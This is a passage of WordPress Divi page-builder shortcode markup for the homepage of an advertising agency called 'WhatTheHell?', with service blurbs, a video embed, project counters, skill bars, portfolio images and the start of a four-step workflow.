text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||5px|||\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||40px|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Why-we\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" hover_enabled=\"0\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\" custom_margin=\"-86px|||||\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"||31px|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p><span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x434.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" title_text=\"217x434\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Creative graphic designing\" title_text=\"Creative graphic designing\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\" hover_enabled=\"0\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" hover_enabled=\"0\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]\n\nLead/Sales Generation Campaign - 77%\n\n[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" hover_enabled=\"0\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]\n\nDigital Advertising - 85%\n\n[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\" hover_enabled=\"0\" alt=\"creative services\" title_text=\"creative services\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<h2><span>Easy to start</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>\n[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" saved_specialty_column_type=\"1_2\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" 